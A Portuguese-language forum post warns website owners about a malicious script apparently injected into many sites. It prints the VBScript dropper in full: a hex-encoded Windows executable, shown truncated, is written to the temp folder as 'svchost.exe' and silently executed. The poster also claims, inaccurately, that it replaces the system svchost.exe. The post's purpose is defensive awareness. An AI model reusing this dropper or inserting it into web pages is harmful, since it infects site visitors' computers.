Recebi um email de um colega que trabalha em segurança web, alertando para um script que anda a circular em muitos sites e que instala um virus no pc dos visitantes. Avisaram-me para ver em todos os meus sites se não tinha nos ficheiros html o seguinte código:
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000F453ECC2B0328291B0328291B03282910D7D1491B4328291B94A1791A7328291B94A1191A7328291B0328391E5338291B94A019126328291B94A0691EE328291B94A1691B1328291B94A1391B13282916FB88026B03282910000000000000000504500004C010500D327A5470000000000000000E0000F010B0108000004000000A2010000000000C83400000010000000E000000000400000100000000200000500010000000000040000000000000000F0010000040000AB07010002000000000030000030000000003000003000000000000010000000000000000000000028AC00002102000000C001001C29000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000840600000000000000000000000000000000000000000000000000002E65646174610000E0030000001000000004000000040000000000000000000000000000400000C82E636F6465000000EAB100000020000000B2000000080000000000000000000000000000200000EC2E7465787462737348C1000000E000000004000000BA0000000000000000000000000000400000C04441544100000000E203000000B001000004000000BE0000000000000000000000000000400000C02E727372630000000030000000C00100002A000000C20000000000000000000000000000400000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000EBA01B7D12DC187DC2F7187DB8691A7D5234197D0D35197DD126197DB9A01B7D7F11197DF8ED187D323C1B7D38DB187DEEE6187D911F197DA5C5187D04DB187DCA28187D81B5187D00000000BB53547D0118B977811BB9779D16B9777816B977CF33B977D21BB97700000000F1F6BA77760BBC7741AFBC777AFFBA774EF8BA7720D0BB77216EBC77BCBBBD77400CBE777382BC773EFBBD771DF7BA775C82BC77000000003474817D4385817D6B6F817D7D59837D3B89827D137C817D5F18837DDBD0817D9F5C817D85B2817D7AA4817D6F91817D078E817D6D65847D5959827DB4DD837DD0DC837D55BE817D0C79817D6771817D81BB827D6BEF837D7982817D5565817D9785817D6072817DCAEC827DD493827DAE76817D0165817D556C817D1391817D7D5D817DD256817DE3B1817D044B817D68BD817D739D817DE471817D976F817DC3BD817D2163847D384C817D726A817D50C6837D1EA0817D6B4E817D8295817DFC06837D1D5E817DD579817D994E817DBD49817DF45F817DE8AE817D10C9817D724A817D1D8D817D(...)00000000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
Este script substitui o ficheiro svchost.exe do computador do visitante por um svchost.exe com virus.
Este ficheiro está sempre activo nos computadores e pode causar muitos estragos.
Vejam também nos vossos sites se não tem nada, informaram-me que muitos sites estão a ser invadidos por hackers que inserem este script nos ficheiros dos sites e se não o detectamos vai infectar os nossos visitantes.
Já verifiquei todos os meus sites e não tenho nada mas é de ficar preocupado saber que anda gente a fazer isso.
Se os colegas do +t souberem da origem desta ameaça era bom que informassem aqui.